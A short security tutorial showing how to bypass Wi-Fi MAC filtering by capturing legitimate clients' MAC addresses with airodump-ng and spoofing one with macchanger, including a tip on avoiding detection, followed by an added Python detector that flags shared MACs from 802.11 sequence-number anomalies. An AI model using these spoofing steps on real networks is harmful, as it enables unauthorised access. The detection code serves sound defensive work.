Bypass MAC Filtering
This attack scenario shows that MAC filtering can be bypassed very easily and provides no security at all. The idea behind the attack is to locate the MAC addresses of legitimate clients and then spoof one of them so that the MAC filtering list accepts your interface.
Steps:
Create a monitoring interface with the following command:
airmon-ng start INTERFACE
You can capture authentication frames in Wireshark with the following filter:
wlan.fc.type_subtype == 0x0b
Identify the target network using Airodump-ng:
airodump-ng MONITOR_INTERFACE
Try to connect to your target Access Point and check Wireshark output:
iwconfig INTERFACE essid "NETWORK_ESSID"
Now, provide the BSSID of the target network in order to locate legitimate clients and their MAC addresses:
airodump-ng --bssid MAC_ADDRESS MONITOR_INTERFACE
I’m going to use the macchanger tool to easily change the physical address of my wireless network interface.
macchanger --mac=MAC_ADDRESS INTERFACE
After restarting the network-manager service, you are ready to connect:
service network-manager restart
Always keep in mind that you should not connect to the network while the client whose MAC address you are spoofing is also connected. The connection will succeed, but you will create a network conflict and the legitimate client will start investigating the connectivity issue.
Be sure to check it with airodump-ng first!
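The network conflict described above is also what a defender can watch for. The following added example (not part of the original article) flags a source MAC that is used by two radios at once by checking 802.11 sequence numbers, which a single transmitter increments steadily. The frame tuples, thresholds and MAC addresses are constructed, and it assumes all records for a MAC come from one sequence counter (for instance non-QoS or management frames).

```python
from collections import defaultdict

SEQ_MOD = 4096  # 802.11 sequence numbers are 12 bits wide and wrap at 4096


def find_shared_macs(frames, max_gap=64, min_anomalies=3):
    """Return {mac: anomaly_count} for source MACs whose sequence numbers
    jump in a way one transmitter would not produce.

    frames: iterable of (timestamp, src_mac, seq) tuples in capture order.
    max_gap and min_anomalies are assumed thresholds; tune them per site.
    """
    last_seq = {}
    anomalies = defaultdict(int)
    for _ts, mac, seq in frames:
        mac = mac.lower()
        if mac in last_seq:
            # Forward distance modulo 4096: 0 is a retransmission, a small
            # value is normal progress or frames the sniffer missed, and a
            # backward jump shows up as a large value.
            gap = (seq - last_seq[mac]) % SEQ_MOD
            if gap > max_gap:
                anomalies[mac] += 1
        last_seq[mac] = seq
    # Require several anomalies so a single counter reset raises no alert.
    return {m: n for m, n in anomalies.items() if n >= min_anomalies}


# Constructed sample: ...:01 is one radio (retransmission, wrap, one missed
# frame); ...:02 is two radios with independent counters sharing one MAC.
SAMPLE = [
    (0.00, "02:00:00:00:00:01", 4093),
    (0.01, "02:00:00:00:00:02", 100),
    (0.02, "02:00:00:00:00:01", 4094),
    (0.03, "02:00:00:00:00:02", 2500),
    (0.04, "02:00:00:00:00:01", 4094),
    (0.05, "02:00:00:00:00:02", 101),
    (0.06, "02:00:00:00:00:01", 0),
    (0.07, "02:00:00:00:00:02", 2501),
    (0.08, "02:00:00:00:00:01", 1),
    (0.09, "02:00:00:00:00:02", 102),
]

if __name__ == "__main__":
    for mac, count in find_shared_macs(SAMPLE).items():
        print(f"{mac}: {count} sequence anomalies, possible shared MAC")
```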